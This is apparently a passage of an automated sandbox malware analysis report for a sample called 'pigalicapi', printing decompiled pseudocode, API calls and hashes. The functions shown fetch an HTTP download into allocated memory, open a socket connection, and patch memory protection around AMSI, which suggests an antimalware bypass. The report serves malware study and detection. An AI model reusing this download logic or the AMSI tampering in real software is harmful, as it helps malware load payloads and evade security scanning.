                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603533696.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603602052.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: File$Virtual$FreeHandleModule$AllocCloseCreateNameReadSizelstrcatlstrcpylstrcpynlstrlen
                                                                                                                                                                                                                                                                          • String ID: .dll
                                                                                                                                                                                                                                                                          • API String ID: 4040249471-2738580789
                                                                                                                                                                                                                                                                          • Opcode ID: 200bb4075ff646b41afc5d2470261fe04451761bc05d74db12b83caaac164272
                                                                                                                                                                                                                                                                          • Instruction ID: c2c5132629a25a5507b869beac9dac576087064a04ada7ddd23a517ed68c32e0
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 200bb4075ff646b41afc5d2470261fe04451761bc05d74db12b83caaac164272
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AC814EB5940228ABEB35DF50DC89BDDB7B5AB48304F1081D8EA09B7280D674AFC4CF55
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 96%
                                                                                                                                                                                                                                                                          			E04002AF0(char* _a4, intOrPtr _a8, long _a12, signed char _a16) {
                                                                                                                                                                                                                                                                          				long _v8;
                                                                                                                                                                                                                                                                          				char _v84;
                                                                                                                                                                                                                                                                          				void* _v88;
                                                                                                                                                                                                                                                                          				signed int _v92;
                                                                                                                                                                                                                                                                          				long _v96;
                                                                                                                                                                                                                                                                          				void _v100;
                                                                                                                                                                                                                                                                          				void _v356;
                                                                                                                                                                                                                                                                          				long _v360;
                                                                                                                                                                                                                                                                          				long _v364;
                                                                                                                                                                                                                                                                          				intOrPtr _v368;
                                                                                                                                                                                                                                                                          				void* _v372;
                                                                                                                                                                                                                                                                          				long _v376;
                                                                                                                                                                                                                                                                          				void* _v380;
                                                                                                                                                                                                                                                                          				signed char _v381;
                                                                                                                                                                                                                                                                          				long _v388;
                                                                                                                                                                                                                                                                          				long _v392;
                                                                                                                                                                                                                                                                          				void* _v396;
                                                                                                                                                                                                                                                                          				char _v652;
                                                                                                                                                                                                                                                                          				long _v656;
                                                                                                                                                                                                                                                                          				long _v660;
                                                                                                                                                                                                                                                                          				void* _t139;
                                                                                                                                                                                                                                                                          				void* _t140;
                                                                                                                                                                                                                                                                          				void* _t142;
                                                                                                                                                                                                                                                                          				long _t149;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                          				if( *0x4013b80 == 0 || _a4 == 0 || _a8 == 0 || _a12 == 0) {
                                                                                                                                                                                                                                                                          					L25:
                                                                                                                                                                                                                                                                          					return _v8;
                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                          					memcpy( &_v84, "Accept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip, deflate\r\n", 0x10 << 2);
                                                                                                                                                                                                                                                                          					asm("movsw");
                                                                                                                                                                                                                                                                          					asm("movsb");
                                                                                                                                                                                                                                                                          					_v92 = 0x80000200;
                                                                                                                                                                                                                                                                          					if((_a16 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                          						_v92 = _v92 | 0x00803000;
                                                                                                                                                                                                                                                                          						_v96 = 4;
                                                                                                                                                                                                                                                                          						_t139 =  *0x4013b80; // 0x0
                                                                                                                                                                                                                                                                          						InternetQueryOptionA(_t139, 0x1f,  &_v100,  &_v96);
                                                                                                                                                                                                                                                                          						_v100 = _v100 | 0x00000100;
                                                                                                                                                                                                                                                                          						_t140 =  *0x4013b80; // 0x0
                                                                                                                                                                                                                                                                          						InternetSetOptionA(_t140, 0x1f,  &_v100, 4);
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					_t142 =  *0x4013b80; // 0x0
                                                                                                                                                                                                                                                                          					_v88 = InternetOpenUrlA(_t142, _a4,  &_v84, 0x42, _v92, 0);
                                                                                                                                                                                                                                                                          					if(_v88 == 0) {
                                                                                                                                                                                                                                                                          						_v660 = GetLastError();
                                                                                                                                                                                                                                                                          						goto L25;
                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                          						_v360 = 0x100;
                                                                                                                                                                                                                                                                          						E04007D20( &_v356,  &_v356, 0, 0x100);
                                                                                                                                                                                                                                                                          						_v364 = 0;
                                                                                                                                                                                                                                                                          						if(HttpQueryInfoA(_v88, 0x13,  &_v356,  &_v360,  &_v364) == 0) {
                                                                                                                                                                                                                                                                          							L23:
                                                                                                                                                                                                                                                                          							InternetCloseHandle(_v88);
                                                                                                                                                                                                                                                                          							goto L25;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						_v368 = E04007DD0( &_v356);
                                                                                                                                                                                                                                                                          						if(_v368 != 0xc8) {
                                                                                                                                                                                                                                                                          							goto L23;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						_v372 = VirtualAlloc(0, _a12, 0x3000, 4);
                                                                                                                                                                                                                                                                          						if(_v372 == 0) {
                                                                                                                                                                                                                                                                          							goto L23;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						_v388 = 0;
                                                                                                                                                                                                                                                                          						_v376 = 0;
                                                                                                                                                                                                                                                                          						_v380 = _v372;
                                                                                                                                                                                                                                                                          						while(1) {
                                                                                                                                                                                                                                                                          							InternetReadFile(_v88, _v380, _a12,  &_v376);
                                                                                                                                                                                                                                                                          							if(_v376 == 0) {
                                                                                                                                                                                                                                                                          								break;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							_v388 = _v388 + _v376;
                                                                                                                                                                                                                                                                          							_v380 = _v380 + _v376;
                                                                                                                                                                                                                                                                          							_t149 = _a12 - _v376;
                                                                                                                                                                                                                                                                          							_a12 = _t149;
                                                                                                                                                                                                                                                                          							if(_t149 >= 0) {
                                                                                                                                                                                                                                                                          								continue;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							L16:
                                                                                                                                                                                                                                                                          							_v8 = _v388;
                                                                                                                                                                                                                                                                          							_v396 = _v372;
                                                                                                                                                                                                                                                                          							_v392 = 0x100;
                                                                                                                                                                                                                                                                          							E04007D20(_v388,  &_v652, 0, 0x100);
                                                                                                                                                                                                                                                                          							_v381 = 0;
                                                                                                                                                                                                                                                                          							if(HttpQueryInfoA(_v88, 0x1d,  &_v652,  &_v392,  &_v364) != 0 && lstrcmpiA( &_v652, "gzip") == 0) {
                                                                                                                                                                                                                                                                          								_v656 = E04002E00(_v388, _v372, _v388, _a8, _a12);
                                                                                                                                                                                                                                                                          								if(_v656 > 0) {
                                                                                                                                                                                                                                                                          									_v8 = _v656;
                                                                                                                                                                                                                                                                          									_v396 = _a8;
                                                                                                                                                                                                                                                                          									_v381 = 1;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							if((_v381 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                          								E04007B70(_a8, _v372, _v8);
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							VirtualFree(_v372, 0, 0x8000);
                                                                                                                                                                                                                                                                          							goto L23;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						goto L16;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          			}



























                                                                                                                                                                                                                                                                          0x04002afb
                                                                                                                                                                                                                                                                          0x04002b09
                                                                                                                                                                                                                                                                          0x04002df2
                                                                                                                                                                                                                                                                          0x04002dfa
                                                                                                                                                                                                                                                                          0x04002b2d
                                                                                                                                                                                                                                                                          0x04002b3a
                                                                                                                                                                                                                                                                          0x04002b3c
                                                                                                                                                                                                                                                                          0x04002b3e
                                                                                                                                                                                                                                                                          0x04002b3f
                                                                                                                                                                                                                                                                          0x04002b4c
                                                                                                                                                                                                                                                                          0x04002b57
                                                                                                                                                                                                                                                                          0x04002b5a
                                                                                                                                                                                                                                                                          0x04002b6b
                                                                                                                                                                                                                                                                          0x04002b72
                                                                                                                                                                                                                                                                          0x04002b81
                                                                                                                                                                                                                                                                          0x04002b8c
                                                                                                                                                                                                                                                                          0x04002b93
                                                                                                                                                                                                                                                                          0x04002b93
                                                                                                                                                                                                                                                                          0x04002ba9
                                                                                                                                                                                                                                                                          0x04002bb6
                                                                                                                                                                                                                                                                          0x04002bbd
                                                                                                                                                                                                                                                                          0x04002de0
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04002bc3
                                                                                                                                                                                                                                                                          0x04002bc3
                                                                                                                                                                                                                                                                          0x04002bdb
                                                                                                                                                                                                                                                                          0x04002be3
                                                                                                                                                                                                                                                                          0x04002c10
                                                                                                                                                                                                                                                                          0x04002dce
                                                                                                                                                                                                                                                                          0x04002dd2
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04002dd2
                                                                                                                                                                                                                                                                          0x04002c25
                                                                                                                                                                                                                                                                          0x04002c35
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04002c4e
                                                                                                                                                                                                                                                                          0x04002c5b
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04002c61
                                                                                                                                                                                                                                                                          0x04002c6b
                                                                                                                                                                                                                                                                          0x04002c7b
                                                                                                                                                                                                                                                                          0x04002c81
                                                                                                                                                                                                                                                                          0x04002c97
                                                                                                                                                                                                                                                                          0x04002ca4
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04002cb4
                                                                                                                                                                                                                                                                          0x04002cc6
                                                                                                                                                                                                                                                                          0x04002ccf
                                                                                                                                                                                                                                                                          0x04002cd5
                                                                                                                                                                                                                                                                          0x04002cd8
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04002cdc
                                                                                                                                                                                                                                                                          0x04002cde
                                                                                                                                                                                                                                                                          0x04002ce4
                                                                                                                                                                                                                                                                          0x04002ced
                                                                                                                                                                                                                                                                          0x04002cf3
                                                                                                                                                                                                                                                                          0x04002d0b
                                                                                                                                                                                                                                                                          0x04002d13
                                                                                                                                                                                                                                                                          0x04002d3d
                                                                                                                                                                                                                                                                          0x04002d70
                                                                                                                                                                                                                                                                          0x04002d7d
                                                                                                                                                                                                                                                                          0x04002d85
                                                                                                                                                                                                                                                                          0x04002d8b
                                                                                                                                                                                                                                                                          0x04002d91
                                                                                                                                                                                                                                                                          0x04002d91
                                                                                                                                                                                                                                                                          0x04002d7d
                                                                                                                                                                                                                                                                          0x04002da1
                                                                                                                                                                                                                                                                          0x04002db2
                                                                                                                                                                                                                                                                          0x04002db7
                                                                                                                                                                                                                                                                          0x04002dc8
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04002dc8
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04002ca6
                                                                                                                                                                                                                                                                          0x04002bbd

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • InternetQueryOptionA.WININET(00000000,0000001F,?,00000004), ref: 04002B72
                                                                                                                                                                                                                                                                          • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 04002B93
                                                                                                                                                                                                                                                                          • InternetOpenUrlA.WININET(00000000,00000000,?,00000042,80000200,00000000), ref: 04002BB0
                                                                                                                                                                                                                                                                          • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 04002C08
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 04002C48
                                                                                                                                                                                                                                                                          • InternetReadFile.WININET(00000000,?,00000000,00000000), ref: 04002C97
                                                                                                                                                                                                                                                                          • HttpQueryInfoA.WININET(00000000,0000001D,?,00000100,00000000), ref: 04002D35
                                                                                                                                                                                                                                                                          • lstrcmpiA.KERNEL32(?,gzip), ref: 04002D4B
                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 04002DC8
                                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 04002DD2
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 04002DDA
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          • Accept: */*Accept-Language: enAccept-Encoding: gzip, deflate, xrefs: 04002B32
                                                                                                                                                                                                                                                                          • gzip, xrefs: 04002D3F
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.603215187.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603118352.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603533696.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603602052.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Internet$Query$HttpInfoOptionVirtual$AllocCloseErrorFileFreeHandleLastOpenReadlstrcmpi
                                                                                                                                                                                                                                                                          • String ID: Accept: */*Accept-Language: enAccept-Encoding: gzip, deflate$gzip
                                                                                                                                                                                                                                                                          • API String ID: 2564233093-2863726208
                                                                                                                                                                                                                                                                          • Opcode ID: 726b61e79d92e4b1ea791cc461ac74fab5e679057ddcff3c63822b6443729a61
                                                                                                                                                                                                                                                                          • Instruction ID: 59e70dbda308a2a2546c0d296605ce979221f8659c43edef85f985c08622dbb4
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 726b61e79d92e4b1ea791cc461ac74fab5e679057ddcff3c63822b6443729a61
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6B91FC75904218ABEB65CF94CC48BEAB7B5BB48304F50819DE609BB280DB796E84CF50
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(0000007F), ref: 100014DB
                                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(0000007F), ref: 10001507
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.608609386.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_10001000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorLast
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1452528299-0
                                                                                                                                                                                                                                                                          • Opcode ID: 29cfafdec3d3a1262f4827b6cae24ea1b9a18653203c5f05ee1a645c7d2a8912
                                                                                                                                                                                                                                                                          • Instruction ID: 25e538b33cc42fa1af6dbc26f5ecb21efd633c51d41fb312bc782d6f26faee88
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 29cfafdec3d3a1262f4827b6cae24ea1b9a18653203c5f05ee1a645c7d2a8912
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1871F874E04109EFEB08DF94C990AAEB7B2FF48345F248598E915AB345D735EE81CB90
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 53%
                                                                                                                                                                                                                                                                          			E0400A090(signed int __eax, intOrPtr _a4, signed short _a8, intOrPtr _a12, char _a16) {
                                                                                                                                                                                                                                                                          				signed char _v8;
                                                                                                                                                                                                                                                                          				short _v12;
                                                                                                                                                                                                                                                                          				signed char _v13;
                                                                                                                                                                                                                                                                          				signed int _v20;
                                                                                                                                                                                                                                                                          				intOrPtr _v32;
                                                                                                                                                                                                                                                                          				short _v34;
                                                                                                                                                                                                                                                                          				char _v36;
                                                                                                                                                                                                                                                                          				intOrPtr _v40;
                                                                                                                                                                                                                                                                          				char _v44;
                                                                                                                                                                                                                                                                          				signed int _t40;
                                                                                                                                                                                                                                                                          				char* _t42;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_push(6);
                                                                                                                                                                                                                                                                          				_push(1);
                                                                                                                                                                                                                                                                          				_push(2);
                                                                                                                                                                                                                                                                          				L0400B210();
                                                                                                                                                                                                                                                                          				_v20 = __eax;
                                                                                                                                                                                                                                                                          				if(_v20 != 0xffffffff) {
                                                                                                                                                                                                                                                                          					_v36 = 2;
                                                                                                                                                                                                                                                                          					_push(_a8 & 0x0000ffff);
                                                                                                                                                                                                                                                                          					L0400B20A();
                                                                                                                                                                                                                                                                          					_v34 = 2;
                                                                                                                                                                                                                                                                          					_push(_a4);
                                                                                                                                                                                                                                                                          					L0400B204();
                                                                                                                                                                                                                                                                          					_v12 = 2;
                                                                                                                                                                                                                                                                          					if(_v12 == 0) {
                                                                                                                                                                                                                                                                          						return 0xffffffffffffffff;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					_v32 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v12 + 0xc))))));
                                                                                                                                                                                                                                                                          					_v8 = 0;
                                                                                                                                                                                                                                                                          					_v13 = 0;
                                                                                                                                                                                                                                                                          					_v40 = 0;
                                                                                                                                                                                                                                                                          					while(_v40 < _a12) {
                                                                                                                                                                                                                                                                          						_push(0x10);
                                                                                                                                                                                                                                                                          						_t42 =  &_v36;
                                                                                                                                                                                                                                                                          						_push(_t42);
                                                                                                                                                                                                                                                                          						_push(_v20);
                                                                                                                                                                                                                                                                          						L0400B1FE();
                                                                                                                                                                                                                                                                          						if(_t42 != 0) {
                                                                                                                                                                                                                                                                          							_v40 = _v40 + 1;
                                                                                                                                                                                                                                                                          							continue;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						_v13 = 1;
                                                                                                                                                                                                                                                                          						break;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					if((_v13 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                          						if(_a16 != 0) {
                                                                                                                                                                                                                                                                          							_v44 = _a16;
                                                                                                                                                                                                                                                                          							_push(4);
                                                                                                                                                                                                                                                                          							_push( &_v44);
                                                                                                                                                                                                                                                                          							_push(0x1005);
                                                                                                                                                                                                                                                                          							_push(0xffff);
                                                                                                                                                                                                                                                                          							_push(_v20);
                                                                                                                                                                                                                                                                          							L0400B1F2();
                                                                                                                                                                                                                                                                          							_push(4);
                                                                                                                                                                                                                                                                          							_push( &_v44);
                                                                                                                                                                                                                                                                          							_push(0x1006);
                                                                                                                                                                                                                                                                          							_push(0xffff);
                                                                                                                                                                                                                                                                          							_push(_v20);
                                                                                                                                                                                                                                                                          							L0400B1F2();
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						return _v20;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					_t40 = _v20;
                                                                                                                                                                                                                                                                          					_push(_t40);
                                                                                                                                                                                                                                                                          					L0400B1F8();
                                                                                                                                                                                                                                                                          					return _t40 | 0xffffffff;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				return _v20;
                                                                                                                                                                                                                                                                          			}














                                                                                                                                                                                                                                                                          0x0400a096
                                                                                                                                                                                                                                                                          0x0400a098
                                                                                                                                                                                                                                                                          0x0400a09a
                                                                                                                                                                                                                                                                          0x0400a09c
                                                                                                                                                                                                                                                                          0x0400a0a1
                                                                                                                                                                                                                                                                          0x0400a0a8
                                                                                                                                                                                                                                                                          0x0400a0b7
                                                                                                                                                                                                                                                                          0x0400a0bf
                                                                                                                                                                                                                                                                          0x0400a0c0
                                                                                                                                                                                                                                                                          0x0400a0c5
                                                                                                                                                                                                                                                                          0x0400a0cc
                                                                                                                                                                                                                                                                          0x0400a0cd
                                                                                                                                                                                                                                                                          0x0400a0d2
                                                                                                                                                                                                                                                                          0x0400a0d9
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0400a0ea
                                                                                                                                                                                                                                                                          0x0400a0e5
                                                                                                                                                                                                                                                                          0x0400a0f2
                                                                                                                                                                                                                                                                          0x0400a0f9
                                                                                                                                                                                                                                                                          0x0400a0fd
                                                                                                                                                                                                                                                                          0x0400a10f
                                                                                                                                                                                                                                                                          0x0400a117
                                                                                                                                                                                                                                                                          0x0400a119
                                                                                                                                                                                                                                                                          0x0400a11c
                                                                                                                                                                                                                                                                          0x0400a120
                                                                                                                                                                                                                                                                          0x0400a121
                                                                                                                                                                                                                                                                          0x0400a128
                                                                                                                                                                                                                                                                          0x0400a10c
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0400a10c
                                                                                                                                                                                                                                                                          0x0400a12a
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0400a12a
                                                                                                                                                                                                                                                                          0x0400a138
                                                                                                                                                                                                                                                                          0x0400a14c
                                                                                                                                                                                                                                                                          0x0400a151
                                                                                                                                                                                                                                                                          0x0400a154
                                                                                                                                                                                                                                                                          0x0400a159
                                                                                                                                                                                                                                                                          0x0400a15a
                                                                                                                                                                                                                                                                          0x0400a15f
                                                                                                                                                                                                                                                                          0x0400a167
                                                                                                                                                                                                                                                                          0x0400a168
                                                                                                                                                                                                                                                                          0x0400a16d
                                                                                                                                                                                                                                                                          0x0400a172
                                                                                                                                                                                                                                                                          0x0400a173
                                                                                                                                                                                                                                                                          0x0400a178
                                                                                                                                                                                                                                                                          0x0400a180
                                                                                                                                                                                                                                                                          0x0400a181
                                                                                                                                                                                                                                                                          0x0400a181
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0400a186
                                                                                                                                                                                                                                                                          0x0400a13a
                                                                                                                                                                                                                                                                          0x0400a13d
                                                                                                                                                                                                                                                                          0x0400a13e
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0400a143
                                                                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • socket.WS2_32(00000002,00000001,00000006), ref: 0400A09C
                                                                                                                                                                                                                                                                          • htons.WS2_32(?), ref: 0400A0C0
                                                                                                                                                                                                                                                                          • gethostbyname.WS2_32(?), ref: 0400A0CD
                                                                                                                                                                                                                                                                          • connect.WS2_32(000000FF,?,00000010), ref: 0400A121
                                                                                                                                                                                                                                                                          • closesocket.WS2_32(000000FF), ref: 0400A13E
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.603215187.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603118352.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603533696.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603602052.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: closesocketconnectgethostbynamehtonssocket
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 530611402-0
                                                                                                                                                                                                                                                                          • Opcode ID: 747257bfaed683e84bc49f1cdc42f1adb0bebd178f9909ce09bf36877d3dd108
                                                                                                                                                                                                                                                                          • Instruction ID: a070b3506782e3d460d1e62e3f028d70face053f71bdd0f6ca274d7f1f380b7b
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 747257bfaed683e84bc49f1cdc42f1adb0bebd178f9909ce09bf36877d3dd108
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 65312B70B00319ABEB10EFE4D845BFEB7B5AF98314F108659E5217B2C0E7B5A940CB91
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • LoadLibraryExA.KERNEL32(10004070,00000000,00000800), ref: 10002509
                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,10004078), ref: 10002525
                                                                                                                                                                                                                                                                          • VirtualProtect.KERNEL32(?,00000004,00000040,?), ref: 10002560
                                                                                                                                                                                                                                                                          • VirtualProtect.KERNEL32(?,00000004,?,?), ref: 10002581
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.608609386.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_10001000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ProtectVirtual$AddressLibraryLoadProc
                                                                                                                                                                                                                                                                          • String ID: AMSI
                                                                                                                                                                                                                                                                          • API String ID: 3300690313-3828877684
                                                                                                                                                                                                                                                                          • Opcode ID: 39020bfaabfcf144605de5e0a77759fb48e00e494b42d059a3f8fbf759fe6226
                                                                                                                                                                                                                                                                          • Instruction ID: 1f1fccf587520e98a24689dc9d6c387d6eb81e8a4efd5f3f63844951b48620cd
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 39020bfaabfcf144605de5e0a77759fb48e00e494b42d059a3f8fbf759fe6226
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8D111CB4D01209EFEB04CF94CC99BAEBBB4FB48341F208559EA01B7384D7706A40DB59
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 68%
                                                                                                                                                                                                                                                                          			E04009290() {
                                                                                                                                                                                                                                                                          				char _v8;
                                                                                                                                                                                                                                                                          				_Unknown_base(*)()* _v12;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                          				_v12 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "IsWow64Process");
                                                                                                                                                                                                                                                                          				if(_v12 != 0) {
                                                                                                                                                                                                                                                                          					_v12(GetCurrentProcess(),  &_v8);
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				return _v8;
                                                                                                                                                                                                                                                                          			}





                                                                                                                                                                                                                                                                          0x04009296
                                                                                                                                                                                                                                                                          0x040092b4
                                                                                                                                                                                                                                                                          0x040092bb
                                                                                                                                                                                                                                                                          0x040092c8
                                                                                                                                                                                                                                                                          0x040092c8
                                                                                                                                                                                                                                                                          0x040092d1

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,IsWow64Process), ref: 040092A7
                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 040092AE
                                                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000000), ref: 040092C1
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.603215187.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603118352.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603533696.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603602052.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AddressCurrentHandleModuleProcProcess
                                                                                                                                                                                                                                                                          • String ID: IsWow64Process$kernel32.dll
                                                                                                                                                                                                                                                                          • API String ID: 4190356694-3024904723
                                                                                                                                                                                                                                                                          • Opcode ID: 38042a03575f21376aceb1f4956717d964388ed776961314cc3b8e9b1f133714
                                                                                                                                                                                                                                                                          • Instruction ID: 4f9345edf5834c8cb0bc8acfac962fe0122c83c58fee2cee7c9637e45e33d241
